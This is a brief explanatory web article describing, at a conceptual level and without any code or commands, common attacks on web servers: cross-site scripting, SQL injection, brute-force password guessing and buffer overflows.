What Are the Common Types of Attack on Web Servers?by Chad Anderson
A malicious attacker has numerous methods at his disposal to compromise Web servers. Web applications require a number of interlaced applications to function properly. This means the Web server's administrator must monitor databases, extended markup languages, script interpreters and much more. Every website running on a Web server has the potential, through coding, to compromise the server. The attacks are broad and numerous, but they all fall into similar categories.
Cross-site scripting, according to White Hat Security, is the most common problem on websites, with over 80 percent of sites being vulnerable. XSS allows attackers to run arbitrary code on either a client or the server, depending on the arrangement of the attack. The problem of XSS arises when input strings, in search boxes or forms, are not properly sanitized to remove illegal characters. On submission of a form, a nonsanitized string can escape the form's code and execute its own code, hosted on another site, to exploit the client machine.
SQL is the most common database language used in conjunction with Web servers. SQL databases store and serve large amounts of user information, including user names, passwords and financial information. As with XSS, an SQL injection attack relies on unsanitized strings to inject an SQL query into the database, either inserting new or requesting current information. This can lead to dozens of enumerated user names, the first step to compromising a user account.
Brute Force Attacks
The brute force attack, which does not require much technical knowledge to accomplish, is why most websites are designed to lock out a user name with five or more failed password attempts. In a brute force attack, an attacker runs through a list of passwords for a given user name, attempting to guess the proper one. This is often done with a dictionary file, catered to the hacker's attack vector, that can guess the user's passwords more quickly. Another angle to brute force attacks is the guessing of the answer to a user's security question. This occurs when an attacker gathers enough information about the user that she can accurately guess one or more of the user's security question answers and change the account password.
A buffer overflow is an application and programming problem that can lead to security breaches. Buffer overflows occur when an application's memory buffer overflows, writing input into memory outside the buffer's bounds. This causes applications to go haywire, often allowing the execution of arbitrary code on the system and sometimes, if executed properly, dropping attackers directly into a system console. Buffer overflows are largely a server problem and less of a Web application one, meaning regular updates will largely eliminate the problem.
- photo_camera altrendo images/Stockbyte/Getty Images